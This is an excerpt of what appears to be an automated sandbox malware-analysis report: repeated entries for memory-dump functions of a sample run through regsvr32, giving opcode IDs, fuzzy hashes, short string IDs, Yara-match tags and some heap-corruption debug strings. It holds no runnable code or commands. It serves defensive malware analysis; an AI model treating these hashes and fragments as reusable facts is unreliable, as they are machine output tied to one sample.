                                                      • API String ID: 0-899094025
                                                      • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                      • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                      • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                      • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: `H$h$T$TaK$_
                                                      • API String ID: 963392458-2145750592
                                                      • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                      • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                      • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                      • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      Strings
                                                      • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                      • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %Nz$,7%$}]{
                                                      • API String ID: 0-2809531587
                                                      • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                      • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                      • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                      • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,mQ$f41$c
                                                      • API String ID: 0-1594525360
                                                      • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                      • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                      • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                      • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q~$%s$R3
                                                      • API String ID: 0-2520873970
                                                      • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                      • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                      • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                      • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [/$s$|'
                                                      • API String ID: 0-508247755
                                                      • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                      • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                      • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                      • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _#>$`cb{$fq
                                                      • API String ID: 0-41881557
                                                      • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                      • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                      • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                      • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =Z8$[U${To
                                                      • API String ID: 0-582923006
                                                      • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                      • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                      • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                      • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$u.
                                                      • API String ID: 0-1908859981
                                                      • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                      • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                      • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                      • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: v^$|8W
                                                      • API String ID: 0-4274756280
                                                      • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                      • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                      • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                      • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `:$u5\
                                                      • API String ID: 0-1141760586
                                                      • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                      • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                      • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                      • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0Au$]6
                                                      • API String ID: 0-775207805
                                                      • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                      • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                      • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                      • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: S9$qrd
                                                      • API String ID: 0-2332744662
                                                      • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                      • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                      • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                      • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hw}2$4&t
                                                      • API String ID: 0-1169878757
                                                      • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                      • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                      • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                      • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JMWd$a[
                                                      • API String ID: 0-3276560754
                                                      • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                      • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                      • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                      • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %[$-
                                                      • API String ID: 0-2535708364
                                                      • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                      • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                      • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                      • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /Mr$i:O:
                                                      • API String ID: 0-3426536595
                                                      • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                      • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                      • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                      • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6|4$;|-
                                                      • API String ID: 0-2897245347
                                                      • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                      • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                      • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                      • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: U$U#
                                                      • API String ID: 0-861755185
                                                      • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                      • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                      • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                      • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fK$Pr
                                                      • API String ID: 0-2696692655
                                                      • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                      • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                      • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                      • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ETz
                                                      • API String ID: 0-3877082699
                                                      • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                      • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                      • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                      • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #;*z
                                                      • API String ID: 0-1682342327
                                                      • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                      • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                      • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                      • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: dQ
                                                      • API String ID: 0-4190919517
                                                      • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                      • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                      • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                      • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )0
                                                      • API String ID: 0-1029681778
                                                      • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                      • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                      • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                      • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Uerm
                                                      • API String ID: 0-3179360214
                                                      • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                      • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                      • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                      • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n?,#
                                                      • API String ID: 0-1323099997
                                                      • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                      • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                      • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                      • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NRx
                                                      • API String ID: 0-1393999616
                                                      • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                      • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                      • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                      • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {dN
                                                      • API String ID: 0-923835543
                                                      • Opcode ID: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                      • Instruction ID: f9e1d774cd1a5aafce577d99eb21246fb33c51757267e19de4f8e3655d4c3e4d
                                                      • Opcode Fuzzy Hash: 9e75a9b6c969771d2fbed292b07595da2e1a6dc424cdc2e689696f47c6000392
                                                      • Instruction Fuzzy Hash: A24118B091470D8BCF48DFA8C58A1DEBFB1FB483A8F25521DE90AB6250C7749585CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hT
                                                      • API String ID: 0-434349927
                                                      • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                      • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                      • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                      • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w.
                                                      • API String ID: 0-4252102657
